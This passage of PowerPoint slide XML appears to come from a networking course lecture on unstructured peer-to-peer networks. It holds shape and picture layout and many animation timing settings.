                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="TextBox 2048"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9496783" y="2167183"/>
            <a:ext cx="2216693" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Unstructured P2P Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Picture 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FD67C5-82A0-463F-8FEA-F1FEC4868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546" y="1951022"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Picture 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E3A58C1-7BEA-48C0-B1DF-768CD0EF8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180" y="2605179"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Picture 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{039F1598-5D12-4992-85B1-42492C9C5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335" y="4003954"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFE9D5F-0360-48C6-A6C8-523880B37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2916" y="3347156"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0543F34-0590-4302-8AB9-6537FE3EA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212" y="5820578"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Picture 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078DF791-F8C1-4B31-9F0B-432F0CD3E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8341" y="5856129"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDDBA85-98FC-4988-8159-7472D345B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1515" y="4740903"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 2051">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{998CFA24-0BAA-4213-ABB3-1E9630C878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5173" y="5584911"/>
            <a:ext cx="744134" cy="744134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Speech Bubble: Rectangle 2052">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C862F674-E9A0-4CF3-BC2E-C710B4CF5D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025860" y="5472253"/>
            <a:ext cx="2207844" cy="1044980"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 80947"/>
              <a:gd name="adj2" fmla="val -232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List of Known, “Good” Peers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="158" name="Picture 2" descr="D:\Classes\CS 4700\assets\Email-01.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB9AC57-9934-4F19-8B06-9D4EA3FAE3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1764" y="2696679"/>
            <a:ext cx="613165" cy="613165"/>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 descr="D:\Classes\CS 4700\assets\Email-01.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A89F49A7-6C2E-44AE-BC23-74D327EF08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0226" y="2694512"/>
            <a:ext cx="613165" cy="613165"/>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 descr="D:\Classes\CS 4700\assets\Email-01.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9F351CF-74D5-490A-B8F3-9727443021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6426" y="2702586"/>
            <a:ext cx="613165" cy="613165"/>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2" descr="D:\Classes\CS 4700\assets\Email-01.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F9B095B-404A-4864-9D0A-C11F22D240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3728" y="2694719"/>
            <a:ext cx="613165" cy="613165"/>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 descr="D:\Classes\CS 4700\assets\Email-01.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78F5529A-8D5C-436B-84CA-CBCC6FB0A2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2191" y="2709814"/>
            <a:ext cx="613165" cy="613165"/>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D:\Classes\CS 4700\assets\Email-01.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFB67992-E2AD-46EE-A1DB-E2F5FCBE30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6802" y="2709814"/>
            <a:ext cx="613165" cy="613165"/>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 descr="D:\Classes\CS 4700\assets\Email-01.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85D8CAB-988F-4FCC-830F-A55A5A3412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5265" y="2694806"/>
            <a:ext cx="613165" cy="613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97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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="5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randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="205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053"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2053"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2053"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="5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053"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2053"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="37" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="38" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 2.5E-6 1.48148E-6 L -0.17188 -0.16528 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-8594" y="-8264"/>
                                    </p:animMotion>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13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="113"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="45" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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052"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="205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135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="135"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="58" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="61" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="145"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="145"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="64" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="148"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="67" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="70" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="139"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="139"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="73" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="155"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="155"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="76" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="126"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="126"/>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3074"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3074"/>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4.16667E-6 3.7037E-6 L 0.01731 0.19745 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3074"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="859" y="9861"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="88" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="89" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="158"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="158"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="92" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="159"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="159"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="95" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="160"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="98" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="161"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="161"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="101" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="162"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="162"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="104" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
